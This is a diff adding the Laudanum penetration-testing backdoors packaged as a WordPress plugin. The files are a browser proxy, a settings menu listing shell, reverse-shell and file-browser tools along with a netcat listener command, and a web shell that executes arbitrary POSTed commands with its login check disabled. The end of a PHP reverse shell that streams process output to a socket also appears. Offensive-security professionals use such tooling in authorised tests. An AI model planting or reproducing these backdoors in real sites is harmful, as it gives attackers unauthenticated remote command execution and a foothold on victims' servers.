|
||||
$input = fread($pipes[2], $chunk_size);
|
||||
if ($debug) printit("STDERR: $input");
|
||||
fwrite($sock, $input);
|
||||
}
|
||||
}
|
||||
|
||||
fclose($sock);
|
||||
fclose($pipes[0]);
|
||||
fclose($pipes[1]);
|
||||
fclose($pipes[2]);
|
||||
proc_close($process);
|
||||
|
||||
// Like print, but does nothing if we've daemonised ourself
|
||||
// (I can't figure out how to redirect STDOUT like a proper daemon)
|
||||
function printit ($string) {
|
||||
if (!$daemon) {
|
||||
print "$string\n";
|
||||
}
|
||||
}
|
||||
|
||||
?>
|
||||
|
||||
|
||||
|
336
web-backdoors/wordpress/templates/proxy.php
Normal file
336
web-backdoors/wordpress/templates/proxy.php
Normal file
|
@ -0,0 +1,336 @@
|
|||
<?php
|
||||
ini_set('session.use_cookies', '0');
|
||||
/* *****************************************************************************
|
||||
***
|
||||
*** Laudanum Project
|
||||
*** A Collection of Injectable Files used during a Penetration Test
|
||||
***
|
||||
*** More information is available at:
|
||||
*** http://laudanum.secureideas.net
|
||||
*** laudanum@secureideas.net
|
||||
***
|
||||
*** Project Leads:
|
||||
*** Kevin Johnson <kjohnson@secureideas.net
|
||||
*** Tim Medin <tim@counterhack.com>
|
||||
***
|
||||
*** Copyright 2014 by Kevin Johnson and the Laudanum Team
|
||||
***
|
||||
********************************************************************************
|
||||
***
|
||||
*** This file acts as a browser-based proxy.
|
||||
*** Written by Tim Medin <tim@counterhack.com>
|
||||
***
|
||||
********************************************************************************
|
||||
*** This program is free software; you can redistribute it and/or
|
||||
*** modify it under the terms of the GNU General Public License
|
||||
*** as published by the Free Software Foundation; either version 2
|
||||
*** of the License, or (at your option) any later version.
|
||||
***
|
||||
*** This program is distributed in the hope that it will be useful,
|
||||
*** but WITHOUT ANY WARRANTY; without even the implied warranty of
|
||||
*** MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
|
||||
*** GNU General Public License for more details.
|
||||
***
|
||||
*** You can get a copy of the GNU General Public License from this
|
||||
*** address: http://www.gnu.org/copyleft/gpl.html#SEC1
|
||||
*** You can also write to the Free Software Foundation, Inc., 59 Temple
|
||||
*** Place - Suite 330, Boston, MA 02111-1307, USA.
|
||||
***
|
||||
***************************************************************************** */
|
||||
|
||||
// TODO: If the remote site uses a sessionid it collides with the php sessionid cookie from this page
|
||||
// figure out how to reuse sessionid from the remote site
|
||||
|
||||
include 'ipcheck.php';
|
||||
|
||||
|
||||
/* This error handler will turn all notices, warnings, and errors into fatal
|
||||
* errors, unless they have been suppressed with the @-operator. */
|
||||
function error_handler($errno, $errstr, $errfile, $errline, $errcontext) {
|
||||
/* The @-opertor (used with chdir() below) temporarely makes
|
||||
* error_reporting() return zero, and we don't want to die in that case.
|
||||
* We do note the error in the output, though. */
|
||||
if (error_reporting() == 0) {
|
||||
$_SESSION['output'] .= $errstr . "\n";
|
||||
} else {
|
||||
die('<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN"
|
||||
"http://www.w3.org/TR/html4/strict.dtd">
|
||||
<html>
|
||||
<head>
|
||||
<title>Laudanum PHP Proxy</title>
|
||||
</head>
|
||||
<body>
|
||||
<h1>Fatal Error!</h1>
|
||||
<p><b>' . $errstr . '</b></p>
|
||||
<p>in <b>' . $errfile . '</b>, line <b>' . $errline . '</b>.</p>
|
||||
|
||||
<hr>
|
||||
<address>
|
||||
Copyright © 2014, <a href="mailto:laudanum@secureideas.net">Kevin Johnson</a> and the Laudanum team.<br/>
|
||||
Written by Tim Medin.<br/>
|
||||
Get the latest version at <a href="http://laudanum.secureideas.net">laudanum.secureideas.net</a>.
|
||||
</address>
|
||||
|
||||
</body>
|
||||
</html>');
|
||||
}
|
||||
}
|
||||
|
||||
set_error_handler('error_handler');
|
||||
|
||||
function geturlarray($u) {
|
||||
// creates the url array, addes a scheme if it is missing and retries parsing
|
||||
$o = parse_url($u);
|
||||
if (!isset($o["scheme"])) { $o = parse_url("http://" . $u); }
|
||||
if (!isset($o["path"])) { $o["path"] = "/"; }
|
||||
return $o;
|
||||
}
|
||||
|
||||
function buildurl ($u) {
|
||||
// build the url from the url array
|
||||
// this is used because the built in function isn't
|
||||
// avilable in all installs of php
|
||||
if (!isset($u["host"])) { return null; }
|
||||
|
||||
$s = isset($u["scheme"]) ? $u["scheme"] : "http";
|
||||
$s .= "://" . $u["host"];
|
||||
$s .= isset($u["port"]) ? ":" . $u["port"] : "";
|
||||
$s .= isset($u["path"]) ? $u["path"] : "/";
|
||||
$s .= isset($u["query"]) ? "?" . $u["query"] : "";
|
||||
$s .= isset($u["fragment"]) ? "#" . $u["fragment"] : "";
|
||||
return $s;
|
||||
}
|
||||
|
||||
function buildurlpath ($u) {
|
||||
//gets the full url and attempts to remove the file at the end of the url
|
||||
// e.g. http://blah.com/dir/file.ext => http://blah.com/dir/
|
||||
if (!isset($u["host"])) { return null; }
|
||||
|
||||
$s = isset($u["scheme"])? $u["scheme"] : "http";
|
||||
$s .= "://" . $u["host"];
|
||||
$s .= isset($u["port"]) ? ":" . $u["port"] : "";
|
||||
|
||||
$path = isset($u["path"]) ? $u["path"] : "/";
|
||||
// is the last portion of the path a file or a dir?
|
||||
// assume if there is a . it is a file
|
||||
// if it ends in a / then it is a dir
|
||||
// if neither, than assume dir
|
||||
$dirs = explode("/", $path);
|
||||
$last = $dirs[count($dirs) - 1];
|
||||
if (preg_match('/\./', $last) || !preg_match('/\/$/', $last)) {
|
||||
// its a file, remove the last chunk
|
||||
$path = substr($path, 0, -1 * strlen($last));
|
||||
}
|
||||
|
||||
$s .= $path;
|
||||
return $s;
|
||||
}
|
||||
|
||||
function getfilename ($u) {
|
||||
// returns the file name
|
||||
// e.g. http://blah.com/dir/file.ext returns file.ext
|
||||
// technically, it is the last portion of the url, so there is a potential
|
||||
// for a problem if a http://blah.com/dir returns a file
|
||||
$s = explode("/", $u["path"]);
|
||||
return $s[count($s) - 1];
|
||||
}
|
||||
|
||||
function getcontenttype ($headers) {
|
||||
// gets the content type
|
||||
foreach($headers as $h) {
|
||||
if (preg_match_all("/^Content-Type: (.*)$/", $h, $out)) {
|
||||
return $out[1][0];
|
||||
}
|
||||
}
|
||||
}
|
||||
|
||||
function getcontentencoding ($headers) {
|
||||
foreach ($headers as $h) {
|
||||
if (preg_match_all("/^Content-Encoding: (.*)$/", $h, $out)) {
|
||||
return $out[1][0];
|
||||
}
|
||||
}
|
||||
}
|
||||
|
||||
function removeheader($header, $headers) {
|
||||
foreach (array_keys($headers) as $key) {
|
||||
if (preg_match_all("/^" . $header . ": (.*)$/", $headers[$key], $out)) {
|
||||
unset($headers[$key]);
|
||||
return $headers;
|
||||
}
|
||||
}
|
||||
}
|
||||
|
||||
function rewritecookies($headers) {
|
||||
// removes the path and domain from cookies
|
||||
for ($i = 0; $i < count($headers); $i++) {
|
||||
if (preg_match_all("/^Set-Cookie:/", $headers[$i], $out)) {
|
||||
$headers[$i] = preg_replace("/domain=[^[:space:]]+/", "", $headers[$i]);
|
||||
$headers[$i] = preg_replace("/path=[^[:space:]]+/", "", $headers[$i]);
|
||||
}
|
||||
}
|
||||
return $headers;
|
||||
}
|
||||
|
||||
function getsessionid($headers) {
|
||||
for ($i = 0; $i < count($headers); $i++) {
|
||||
if (preg_match_all("/^Set-Cookie: SessionID=([a-zA-Z0-9]+);/", $headers[$i], $out))
|
||||
return $out[1][0];
|
||||
}
|
||||
return "0";
|
||||
}
|
||||
|
||||
function compatible_gzinflate($gzData) {
|
||||
if ( substr($gzData, 0, 3) == "\x1f\x8b\x08" ) {
|
||||
$i = 10;
|
||||
$flg = ord( substr($gzData, 3, 1) );
|
||||
if ( $flg > 0 ) {
|
||||
if ( $flg & 4 ) {
|
||||
list($xlen) = unpack('v', substr($gzData, $i, 2) );
|
||||
$i = $i + 2 + $xlen;
|
||||
}
|
||||
if ( $flg & 8 )
|
||||
$i = strpos($gzData, "\0", $i) + 1;
|
||||
if ( $flg & 16 )
|
||||
$i = strpos($gzData, "\0", $i) + 1;
|
||||
if ( $flg & 2 )
|
||||
$i = $i + 2;
|
||||
}
|
||||
return @gzinflate( substr($gzData, $i, -8) );
|
||||
} else {
|
||||
return false;
|
||||
}
|
||||
return false;
|
||||
}
|
||||
|
||||
function rewrite ($d, $u) {
|
||||
$r = $d;
|
||||
//rewrite images and links - absolute reference
|
||||
$r = preg_replace("/((src|href).?=.?['\"]?)(\/[^'\"[:space:]]+['\"]?)/", "\\1" . $_SERVER["PHP_SELF"] . "?laudurl=" . $u["scheme"] . "://" . $u["host"] . "\\3", $r);
|
||||
//rewrite images and links - hard linked
|
||||
$r = preg_replace("/((src|href).?=.?['\"])(http[^'\"]+['\"])/", "\\1" . $_SERVER["PHP_SELF"] . "?laudurl=" . "\\3", $r);
|
||||
//rewrite images and links - relative reference
|
||||
$r = preg_replace("/((src|href).?=.?['\"])([^\/][^'\"[:space:]]+['\"]?)/", "\\1" . $_SERVER["PHP_SELF"] . "?laudurl=" . buildurlpath($u) . "\\3", $r);
|
||||
|
||||
|
||||
//rewrite form - absolute reference
|
||||
$r = preg_replace("/(<form(.+?)action.?=.?['\"])(\/[^'\"]+)(['\"])([^\>]*?)>/", "\\1" . $_SERVER["PHP_SELF"] . "\\4><input type=\"hidden\" name=\"laudurl\" value=\"" . $u["scheme"] . "://" . $u["host"] . "\\3\">", $r);
|
||||
//rewrite form - hard linked
|
||||
$r = preg_replace("/(<form(.+?)action.?=.?['\"])(http[^'\"]+)(['\"])([^\>]*?)>/", "\\1" . $_SERVER["PHP_SELF"] . "\\4><input type=\"hidden\" name=\"laudurl\" value=\"" . "\\3\">", $r);
|
||||
//rewrite form - relative reference
|
||||
$r = preg_replace("/(<form(.+?)action.?=.?['\"])([^\/][^'\"]+)(['\"])([^\>]*?)>/", "\\1" . $_SERVER["PHP_SELF"] . "\\4><input type=\"hidden\" name=\"laudurl\" value=\"" . buildurlpath($u) . "\\3\">", $r);
|
||||
return $r;
|
||||
}
|
||||
|
||||
/* Initialize some variables we need again and again. */
|
||||
$url = isset($_GET["laudurl"]) ? $_GET["laudurl"] : "";
|
||||
if ($url == "") {
|
||||
$url = isset($_POST["laudurl"]) ? $_POST["laudurl"] : "";
|
||||
}
|
||||
|
||||
if ($url == "") {
|
||||
?>
|
||||
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN"
|
||||
"http://www.w3.org/TR/html4/strict.dtd">
|
||||
<html>
|
||||
<head>
|
||||
<title>Laudanum PHP Proxy</title>
|
||||
<link rel="stylesheet" href="style.css" type="text/css">
|
||||
|
||||
<script type="text/javascript">
|
||||
function init() {
|
||||
document.proxy.url.focus();
|
||||
}
|
||||
</script>
|
||||
</head>
|
||||
<body onload="init()">
|
||||
|
||||
<h1>Laudanum PHP Proxy</h1>
|
||||
|
||||
<form method="GET" name="proxy">
|
||||
<input type="text" name="laudurl" size="70">
|
||||
|
||||
</form>
|
||||
<hr>
|
||||
<address>
|
||||
Copyright © 2014, <a href="mailto:laudanum@secureideas.net">Kevin Johnson</a> and the Laudanum team.<br/>
|
||||
Written by Tim Medin.<br/>
|
||||
Get the latest version at <a href="http://laudanum.secureideas.net">laudanum.secureideas.net</a>.
|
||||
</address>
|
||||
</body>
|
||||
</html>
|
||||
|
||||
<?php
|
||||
} else {
|
||||
|
||||
$url_c = geturlarray($url);
|
||||
$params = array_merge($_GET, $_POST);
|
||||
|
||||
//don't pass throught the parameter we are using
|
||||
unset($params["laudurl"]);
|
||||
|
||||
//create the query or post parameters
|
||||
$query = http_build_query($params);
|
||||
if ($query != "") {
|
||||
$url_c["query"] = $query;
|
||||
}
|
||||
|
||||
//get the files
|
||||
$fp = fopen(buildurl($url_c), "rb");
|
||||
|
||||
// use the headers, except the response code which is popped off the array
|
||||
$headers = $http_response_header;
|
||||
// pop
|
||||
array_shift($headers);
|
||||
|
||||
// fix cookies
|
||||
$headers = rewritecookies($headers);
|
||||
|
||||
$ctype = getcontenttype($headers);
|
||||
$cencoding = getcontentencoding($headers);
|
||||
|
||||
// we will remove gzip encoding later, but we need to remove the header now
|
||||
// before it is added to the response.
|
||||
if ($cencoding == "gzip")
|
||||
$headers = removeheader("Content-Encoding", $headers);
|
||||
|
||||
// set headers for response to client
|
||||
if (preg_match("/text|image/", $ctype)) {
|
||||
header_remove();
|
||||
// the number of headers can change due to replacement
|
||||
$i = 0;
|
||||
while ($i < count($headers)) {
|
||||
if (strpos($headers[$i], "Set-Cookie:") == false)
|
||||
// replace headers
|
||||
header($headers[$i], true);
|
||||
else
|
||||
// if it is the first cookie, replace all the others. Otherwise add
|
||||
header($headers[$i], false);
|
||||
$i++;
|
||||
}
|
||||
} else {
|
||||
header("Content-Disposition: attachment; filename=" . getfilename($url_c));
|
||||
}
|
||||
|
||||
// get data
|
||||
if (preg_match("/text/",$ctype)) { //text
|
||||
//it is a text format: html, css, js
|
||||
$data = "";
|
||||
while (!feof($fp)) {
|
||||
$data .= fgets($fp, 4096);
|
||||
}
|
||||
|
||||
// uncompress it so it can be rewritten
|
||||
if ($cencoding == "gzip")
|
||||
$data = compatible_gzinflate($data);
|
||||
|
||||
// rewrite all the links and such
|
||||
echo rewrite($data, $url_c);
|
||||
|
||||
} else {
|
||||
// binary format or something similar, let it go through
|
||||
fpassthru($fp);
|
||||
fclose($fp);
|
||||
}
|
||||
}
|
||||
?>
|
67
web-backdoors/wordpress/templates/settings.php
Normal file
67
web-backdoors/wordpress/templates/settings.php
Normal file
|
@ -0,0 +1,67 @@
|
|||
<?php
|
||||
/* *****************************************************************************
|
||||
***
|
||||
*** Laudanum Project
|
||||
*** A Collection of Injectable Files used during a Penetration Test
|
||||
***
|
||||
*** More information is available at:
|
||||
*** http://laudanum.secureideas.net
|
||||
*** laudanum@secureideas.net
|
||||
***
|
||||
*** Project Leads:
|
||||
*** Kevin Johnson <kjohnson@secureideas.net>
|
||||
*** Tim Medin <tim@counterhack.com>
|
||||
***
|
||||
*** Copyright 2014 by Kevin Johnson and the Laudanum Team
|
||||
***
|
||||
********************************************************************************
|
||||
***
|
||||
*** This file provides a convenient menu of Laudanum tools from a Word Press settings
|
||||
*** page.
|
||||
***
|
||||
*** Written by Jason Gillam <jgillam@secureideas.com>
|
||||
***
|
||||
********************************************************************************
|
||||
*** This program is free software; you can redistribute it and/or
|
||||
*** modify it under the terms of the GNU General Public License
|
||||
*** as published by the Free Software Foundation; either version 2
|
||||
*** of the License, or (at your option) any later version.
|
||||
***
|
||||
*** This program is distributed in the hope that it will be useful,
|
||||
*** but WITHOUT ANY WARRANTY; without even the implied warranty of
|
||||
*** MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
|
||||
*** GNU General Public License for more details.
|
||||
***
|
||||
*** You can get a copy of the GNU General Public License from this
|
||||
*** address: http://www.gnu.org/copyleft/gpl.html#SEC1
|
||||
*** You can also write to the Free Software Foundation, Inc., 59 Temple
|
||||
*** Place - Suite 330, Boston, MA 02111-1307, USA.
|
||||
***
|
||||
***************************************************************************** */
|
||||
?>
|
||||
|
||||
|
||||
<div class="wrap">
|
||||
<h2>Laudanum Tools</h2>
|
||||
<ul>
|
||||
<li><a href="<?php echo plugins_url('shell.php', __FILE__);?>">Shell</a> </li>
|
||||
<li><a href="<?php echo plugins_url('dns.php', __FILE__);?>">DNS</a> </li>
|
||||
<li><a href="<?php echo plugins_url('host.php', __FILE__);?>">Host Lookup</a> </li>
|
||||
<li><a href="<?php echo plugins_url('file.php', __FILE__);?>">File Browser</a> </li>
|
||||
<li><a href="<?php echo plugins_url('proxy.php', __FILE__);?>">Proxy</a> </li>
|
||||
|
||||
<li>Reverse Shell -
|
||||
<form action="<?php echo plugins_url('php-reverse-shell.php', __FILE__);?>" method="post">
|
||||
IP: <input name="ip" type="text" value="127.0.0.1">
|
||||
Port: <input name="port" type="text" value="8888">
|
||||
<input type="submit" value="Connect"></p>
|
||||
|
||||
</form></li>
|
||||
<!--<li><a href="<?php echo plugins_url('php-reverse-shell.php', __FILE__);?>">Reverse Shell (requires hard-coded config)</a> </li>-->
|
||||
</form>
|
||||
<li><a href="<?php echo plugins_url('killnc.php', __FILE__);?>">kill nc (recover if nc screws up your shell)</a> </li>
|
||||
|
||||
</ul>
|
||||
* for reverse shell, use netcat to listen, e.g. "nc -v -n -l 8888"
|
||||
</div>
|
||||
|
389
web-backdoors/wordpress/templates/shell.php
Normal file
389
web-backdoors/wordpress/templates/shell.php
Normal file
|
@ -0,0 +1,389 @@
|
|||
<?php
|
||||
/* *****************************************************************************
|
||||
***
|
||||
*** Laudanum Project
|
||||
*** A Collection of Injectable Files used during a Penetration Test
|
||||
***
|
||||
*** More information is available at:
|
||||
*** http://laudanum.secureideas.net
|
||||
*** laudanum@secureideas.net
|
||||
***
|
||||
*** Project Leads:
|
||||
*** Kevin Johnson <kjohnson@secureideas.net>
|
||||
*** Tim Medin <tim@counterhack.com>
|
||||
***
|
||||
*** Copyright 2014 by Kevin Johnson and the Laudanum Team
|
||||
***
|
||||
********************************************************************************
|
||||
***
|
||||
*** This file provides shell access to the system. It is built based on the 2.1
|
||||
*** version of PHPShell which is Copyright (C) 2000-2005 Martin Geisler
|
||||
*** <mgeisler[at]mgeisler.net>
|
||||
***
|
||||
*** Updated by Tim Medin
|
||||
***
|
||||
********************************************************************************
|
||||
*** This program is free software; you can redistribute it and/or
|
||||
*** modify it under the terms of the GNU General Public License
|
||||
*** as published by the Free Software Foundation; either version 2
|
||||
*** of the License, or (at your option) any later version.
|
||||
***
|
||||
*** This program is distributed in the hope that it will be useful,
|
||||
*** but WITHOUT ANY WARRANTY; without even the implied warranty of
|
||||
*** MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
|
||||
*** GNU General Public License for more details.
|
||||
***
|
||||
*** You can get a copy of the GNU General Public License from this
|
||||
*** address: http://www.gnu.org/copyleft/gpl.html#SEC1
|
||||
*** You can also write to the Free Software Foundation, Inc., 59 Temple
|
||||
*** Place - Suite 330, Boston, MA 02111-1307, USA.
|
||||
***
|
||||
***************************************************************************** */
|
||||
|
||||
|
||||
include 'ipcheck.php';
|
||||
|
||||
|
||||
/* This error handler will turn all notices, warnings, and errors into fatal
|
||||
* errors, unless they have been suppressed with the @-operator. */
|
||||
function wpl_error_handler($errno, $errstr, $errfile, $errline, $errcontext) {
|
||||
/* The @-opertor (used with chdir() below) temporarely makes
|
||||
* error_reporting() return zero, and we don't want to die in that case.
|
||||
* We do note the error in the output, though. */
|
||||
if (error_reporting() == 0) {
|
||||
$_SESSION['output'] .= $errstr . "\n";
|
||||
} else {
|
||||
die('<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN"
|
||||
"http://www.w3.org/TR/html4/strict.dtd">
|
||||
<html>
|
||||
<head>
|
||||
<title>Laudanum PHP Shell Access</title>
|
||||
</head>
|
||||
<body>
|
||||
<h1>Fatal Error!</h1>
|
||||
<p><b>' . $errstr . '</b></p>
|
||||
<p>in <b>' . $errfile . '</b>, line <b>' . $errline . '</b>.</p>
|
||||
|
||||
<hr>
|
||||
<address>
|
||||
Copyright © 2014, <a
|
||||
href="mailto:laudanum@secureideas.net">Kevin Johnson</a> and the Laudanum team.<br>
|
||||
Get the latest version at <a href="http://laudanum.secureideas.net">laudanum.secureideas.net</a>.
|
||||
</address>
|
||||
|
||||
</body>
|
||||
</html>');
|
||||
}
|
||||
}
|
||||
|
||||
// set_error_handler('wpl_error_handler');
|
||||
|
||||
|
||||
function logout() {
|
||||
$_SESSION = array('authenticated' => false);
|
||||
if (isset($_COOKIE[session_name()]))
|
||||
setcookie(session_name(), '', time()-42000, '/');
|
||||
session_destroy();
|
||||
}
|
||||
|
||||
|
||||
function wpl_stripslashes_deep($value) {
|
||||
if (is_array($value))
|
||||
return array_map('stripslashes_deep', $value);
|
||||
else
|
||||
return stripslashes($value);
|
||||
}
|
||||
|
||||
if (get_magic_quotes_gpc())
|
||||
$_POST = stripslashes_deep($_POST);
|
||||
|
||||
/* Initialize some variables we need again and again. */
|
||||
//$username = isset($_POST['username']) ? $_POST['username'] : '';
|
||||
//$password = isset($_POST['password']) ? $_POST['password'] : '';
|
||||
//$nounce = isset($_POST['nounce']) ? $_POST['nounce'] : '';
|
||||
|
||||
$command = isset($_POST['command']) ? $_POST['command'] : '';
|
||||
$rows = isset($_POST['rows']) ? $_POST['rows'] : 24;
|
||||
$columns = isset($_POST['columns']) ? $_POST['columns'] : 80;
|
||||
|
||||
|
||||
///* Default settings --- these settings should always be set to something. */
|
||||
//$default_settings = array('home-directory' => '.');
|
||||
|
||||
///* Merge settings. */
|
||||
//$ini['settings'] = array_merge($default_settings, $ini['settings']);
|
||||
|
||||
|
||||
session_start();
|
||||
|
||||
/* Delete the session data if the user requested a logout. This leaves the
|
||||
* session cookie at the user, but this is not important since we
|
||||
* authenticates on $_SESSION['authenticated']. */
|
||||
if (isset($_POST['logout']))
|
||||
logout();
|
||||
|
||||
///* Attempt authentication. */
|
||||
//if (isset($_SESSION['nounce']) && $nounce == $_SESSION['nounce'] &&
|
||||
// isset($ini['users'][$username])) {
|
||||
// if (strchr($ini['users'][$username], ':') === false) {
|
||||
// // No seperator found, assume this is a password in clear text.
|
||||
// $_SESSION['authenticated'] = ($ini['users'][$username] == $password);
|
||||
// } else {
|
||||
// list($fkt, $salt, $hash) = explode(':', $ini['users'][$username]);
|
||||
// $_SESSION['authenticated'] = ($fkt($salt . $password) == $hash);
|
||||
// }
|
||||
//}
|
||||
|
||||
/* Attempt authentication. */
|
||||
if (isset($_SESSION['nounce']) && $nounce == $_SESSION['nounce'] && isset($users[$username]))
|
||||
$_SESSION['authenticated'] = ($users[$username] == hash("sha1", $password));
|
||||
|
||||
/* Enforce default non-authenticated state if the above code didn't set it
|
||||
* already. */
|
||||
if (!isset($_SESSION['authenticated']))
|
||||
$_SESSION['authenticated'] = false;
|
||||
|
||||
if(true) {
|
||||
//if ($_SESSION['authenticated']) {
|
||||
/* Initialize the session variables. */
|
||||
if (empty($_SESSION['cwd'])) {
|
||||
$_SESSION['cwd'] = '.';
|
||||
$_SESSION['history'] = array();
|
||||
$_SESSION['output'] = '';
|
||||
}
|
||||
|
||||
if (!empty($command)) {
|
||||
/* Save the command for late use in the JavaScript. If the command is
|
||||
* already in the history, then the old entry is removed before the
|
||||
* new entry is put into the list at the front. */
|
||||
if (($i = array_search($command, $_SESSION['history'])) !== false)
|
||||
unset($_SESSION['history'][$i]);
|
||||
|
||||
array_unshift($_SESSION['history'], $command);
|
||||
|
||||
/* Now append the commmand to the output. */
|
||||
$_SESSION['output'] .= '$ ' . $command . "\n";
|
||||
|
||||
/* Initialize the current working directory. */
|
||||
if (preg_match('/^[[:blank:]]*cd[[:blank:]]*$/', $command)) {
|
||||
$_SESSION['cwd'] = realpath($ini['settings']['home-directory']);
|
||||
} elseif (preg_match('/^[[:blank:]]*cd[[:blank:]]+([^;]+)$/', $command, $regs)) {
|
||||
/* The current command is a 'cd' command which we have to handle
|
||||
* as an internal shell command. */
|
||||
|
||||
if ($regs[1]{0} == '/') {
|
||||
/* Absolute path, we use it unchanged. */
|
||||
$new_dir = $regs[1];
|
||||
} else {
|
||||
/* Relative path, we append it to the current working
|
||||
* directory. */
|
||||
$new_dir = $_SESSION['cwd'] . '/' . $regs[1];
|
||||
}
|
||||
|
||||
/* Transform '/./' into '/' */
|
||||
while (strpos($new_dir, '/./') !== false)
|
||||
$new_dir = str_replace('/./', '/', $new_dir);
|
||||
|
||||
/* Transform '//' into '/' */
|
||||
while (strpos($new_dir, '//') !== false)
|
||||
$new_dir = str_replace('//', '/', $new_dir);
|
||||
|
||||
/* Transform 'x/..' into '' */
|
||||
while (preg_match('|/\.\.(?!\.)|', $new_dir))
|
||||
$new_dir = preg_replace('|/?[^/]+/\.\.(?!\.)|', '', $new_dir);
|
||||
|
||||
if ($new_dir == '') $new_dir = '/';
|
||||
|
||||
/* Try to change directory. */
|
||||
if (@chdir($new_dir)) {
|
||||
$_SESSION['cwd'] = $new_dir;
|
||||
} else {
|
||||
$_SESSION['output'] .= "cd: could not change to: $new_dir\n";
|
||||
}
|
||||
|
||||
} elseif (trim($command) == 'exit') {
|
||||
logout();
|
||||
} else {
|
||||
|
||||
/* The command is not an internal command, so we execute it after
|
||||
* changing the directory and save the output. */
|
||||
chdir($_SESSION['cwd']);
|
||||
|
||||
// We canot use putenv() in safe mode.
|
||||
if (!ini_get('safe_mode')) {
|
||||
// Advice programs (ls for example) of the terminal size.
|
||||
putenv('ROWS=' . $rows);
|
||||
putenv('COLUMNS=' . $columns);
|
||||
}
|
||||
|
||||
/* Alias expansion. */
|
||||
$length = strcspn($command, " \t");
|
||||
$token = substr($command, 0, $length);
|
||||
if (isset($ini['aliases'][$token]))
|
||||
$command = $ini['aliases'][$token] . substr($command, $length);
|
||||
|
||||
$io = array();
|
||||
$p = proc_open($command,
|
||||
array(1 => array('pipe', 'w'),
|
||||
2 => array('pipe', 'w')),
|
||||
$io);
|
||||
|
||||
/* Read output sent to stdout. */
|
||||
while (!feof($io[1])) {
|
||||
$_SESSION['output'] .= htmlspecialchars(fgets($io[1]),
|
||||
ENT_COMPAT, 'UTF-8');
|
||||
}
|
||||
/* Read output sent to stderr. */
|
||||
while (!feof($io[2])) {
|
||||
$_SESSION['output'] .= htmlspecialchars(fgets($io[2]),
|
||||
ENT_COMPAT, 'UTF-8');
|
||||
}
|
||||
|
||||
fclose($io[1]);
|
||||
fclose($io[2]);
|
||||
proc_close($p);
|
||||
}
|
||||
}
|
||||
|
||||
/* Build the command history for use in the JavaScript */
|
||||
if (empty($_SESSION['history'])) {
|
||||
$js_command_hist = '""';
|
||||
} else {
|
||||
$escaped = array_map('addslashes', $_SESSION['history']);
|
||||
$js_command_hist = '"", "' . implode('", "', $escaped) . '"';
|
||||
}
|
||||
}
|
||||
|
||||
?>
|
||||
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN"
|
||||
"http://www.w3.org/TR/html4/strict.dtd">
|
||||
<html>
|
||||
<head>
|
||||
<title>Laudanum Shell</title>
|
||||
<link rel="stylesheet" href="style.css" type="text/css">
|
||||
|
||||
<script type="text/javascript">
|
||||
<?php if (true) { ?>
|
||||
|
||||
var current_line = 0;
|
||||
var command_hist = new Array(<?php echo $js_command_hist ?>);
|
||||
var last = 0;
|
||||
|
||||
function key(e) {
|
||||
if (!e) var e = window.event;
|
||||
|
||||
if (e.keyCode == 38 && current_line < command_hist.length-1) {
|
||||
command_hist[current_line] = document.shell.command.value;
|
||||
current_line++;
|
||||
document.shell.command.value = command_hist[current_line];
|
||||
}
|
||||
|
||||
if (e.keyCode == 40 && current_line > 0) {
|
||||
command_hist[current_line] = document.shell.command.value;
|
||||
current_line--;
|
||||
document.shell.command.value = command_hist[current_line];
|
||||
}
|
||||
|
||||
}
|
||||
|
||||
function init() {
|
||||
document.shell.setAttribute("autocomplete", "off");
|
||||
document.shell.output.scrollTop = document.shell.output.scrollHeight;
|
||||
document.shell.command.focus();
|
||||
}
|
||||
|
||||
<?php } else { ?>
|
||||
|
||||
function init() {
|
||||
document.shell.username.focus();
|
||||
}
|
||||
|
||||
<?php } ?>
|
||||
</script>
|
||||
</head>
|
||||
|
||||
<body onload="init()">
|
||||
|
||||
<h1>Laudanum Shell</h1>
|
||||
|
||||
<form name="shell" action="<?php echo $_SERVER['PHP_SELF'] ?>" method="post">
|
||||
|
||||
<?php
|
||||
if (false) {
|
||||
/* Genereate a new nounce every time we preent the login page. This binds
|
||||
* each login to a unique hit on the server and prevents the simple replay
|
||||
* attack where one uses the back button in the browser to replay the POST
|
||||
* data from a login. */
|
||||
$_SESSION['nounce'] = mt_rand();
|
||||
|
||||
?>
|
||||
|
||||
<fieldset>
|
||||
<legend>Authentication</legend>
|
||||
|
||||
<?php
|
||||
if (false)
|
||||
echo ' <p class="error">Login failed, please try again:</p>' . "\n";
|
||||
else
|
||||
echo " <p>Please login:</p>\n";
|
||||
?>
|
||||
|
||||
<p>Username: <input name="username" type="text" value="<?php echo $username
|
||||
?>"></p>
|
||||
|
||||
<p>Password: <input name="password" type="password"></p>
|
||||
|
||||
<p><input type="submit" value="Login"></p>
|
||||
|
||||
<input name="nounce" type="hidden" value="<?php echo $_SESSION['nounce']; ?>">
|
||||
|
||||
</fieldset>
|
||||
|
||||
<?php } else { /* Authenticated. */ ?>
|
||||
|
||||
<fieldset>
|
||||
<legend>Current Working Directory: <code><?php
|
||||
echo htmlspecialchars($_SESSION['cwd'], ENT_COMPAT, 'UTF-8');
|
||||
?></code></legend>
|
||||
|
||||
|
||||
<div id="terminal">
|
||||
<textarea name="output" readonly="readonly" cols="<?php echo $columns ?>" rows="<?php echo $rows ?>">
|
||||
<?php
|
||||
$lines = substr_count($_SESSION['output'], "\n");
|
||||
$padding = str_repeat("\n", max(0, $rows+1 - $lines));
|
||||
echo rtrim($padding . $_SESSION['output']);
|
||||
?>
|
||||
</textarea>
|
||||
<p id="prompt">
|
||||
$ <input name="command" type="text"
|
||||
onkeyup="key(event)" size="<?php echo $columns-2 ?>" tabindex="1">
|
||||
</p>
|
||||
</div>
|
||||
|
||||
<p>
|
||||
<span style="float: right">Size: <input type="text" name="rows" size="2"
|
||||
maxlength="3" value="<?php echo $rows ?>"> × <input type="text"
|
||||
name="columns" size="2" maxlength="3" value="<?php echo $columns
|
||||
?>"></span>
|
||||
|
||||
<input type="submit" value="Execute Command">
|
||||
<input type="submit" name="logout" value="Logout">
|
||||
</p>
|
||||
|
||||
</fieldset>
|
||||
|
||||
<?php } ?>
|
||||
|
||||
</form>
|
||||
|
||||
|
||||
<hr/>
|
||||
<address>
|
||||
